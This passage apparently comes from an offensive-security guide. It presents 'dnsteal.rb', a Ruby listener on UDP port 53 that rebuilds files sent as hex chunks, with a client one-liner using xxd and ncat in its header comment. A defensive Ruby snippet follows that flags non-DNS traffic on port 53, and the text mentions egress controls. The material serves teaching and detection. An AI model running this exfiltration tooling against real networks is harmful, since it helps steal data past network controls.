Returns array of all hostnames, if PTR is assigned
["ec2-174-129-41-187.compute-1.amazonaws.com"]
Or use Resolv.getname to get one name only
DNS Data Exfiltration
Outbound DNS connections are usually allowed from local networks, which is the major benefit of using DNS to transfer data to an external server.
dnsteal.rb
```ruby
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
# for hex in $(xxd -p ethernet-cable.jpg); do echo $hex | ncat -u localhost 53 ; done
#
require 'socket'

if ARGV.size < 1
  puts "[+] sudo ruby #{__FILE__} <FILENAME>"
  exit
else
  file = ARGV[0]
end

# Open UDP Socket and bind it to port 53 on all interfaces
udpsoc = UDPSocket.new
udpsoc.bind('0.0.0.0', 53)

begin
  data     = ''
  data_old = ''

  loop do
    response = udpsoc.recvfrom(1000)
    response = response[0].force_encoding("ISO-8859-1").encode("utf-8")
    data = response.match(/[^<][a-f0-9]([a-f0-9]).*[a-f0-9]([a-f0-9])/i).to_s

    # Write received data to file
    File.open(file, 'a') do |d|
      d.write [data].pack("H*") unless data == data_old # Don't write the same data twice (poor workaround)
      puts data unless data == data_old
    end

    data_old = data
  end
rescue Exception => e
  puts e
end
```
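The same traffic from the monitoring side, as an added example that is not part of the original page: the client loop in the script's header comment sends lines of hex text straight to UDP port 53, so those datagrams are not DNS messages and fail a basic structural check. The function names, source addresses and sample payloads below are constructed for illustration, and the query check is a heuristic for single-question queries only.

```ruby
# Added example: classify UDP/53 payloads and count non-DNS ones per source.
HEX_LINE = /\A(?:[0-9a-f]{2})+\s*\z/i   # one line of `xxd -p` style output

# Heuristic: does the payload have the layout of a one-question DNS query?
def dns_query?(payload)
  bytes = payload.bytes
  return false if bytes.size < 17                        # header + root name + QTYPE/QCLASS
  return false unless ((bytes[4] << 8) | bytes[5]) == 1  # QDCOUNT must be 1
  i = 12                                                 # QNAME starts after the header
  loop do
    len = bytes[i]
    return false if len.nil? || len > 63                 # truncated, or not a plain label
    i += 1
    break if len.zero?                                   # root label ends the name
    i += len
  end
  bytes.size >= i + 4                                    # QTYPE and QCLASS present
end

# :dns for a plausible query, :hex_text for raw hex on port 53, else :non_dns.
def classify(payload)
  data = payload.b
  return :dns if dns_query?(data)
  data.match?(HEX_LINE) ? :hex_text : :non_dns
end

# Map each source address to the number of non-DNS datagrams it sent to port 53.
def suspicious_sources(datagrams)
  datagrams.reject { |_src, payload| classify(payload) == :dns }
           .group_by(&:first)
           .transform_values(&:size)
end

# Constructed samples: a real query for example.com and one hex line.
QUERY = [0x1234, 0x0100, 1, 0, 0, 0].pack('n6') +
        "\x07example\x03com\x00".b + [1, 1].pack('n2')
HEX   = "ffd8ffe000104a46494600010101006000600000ffdb0043000806060706\n"
SAMPLE = [['10.0.0.5', QUERY], ['10.0.0.9', HEX],
          ['10.0.0.9', HEX],   ['10.0.0.7', 'hello']]

p suspicious_sources(SAMPLE)
```

An egress policy that only lets internal hosts reach an internal resolver, or a firewall that validates DNS on port 53, stops this particular transfer because nothing in it is a DNS query.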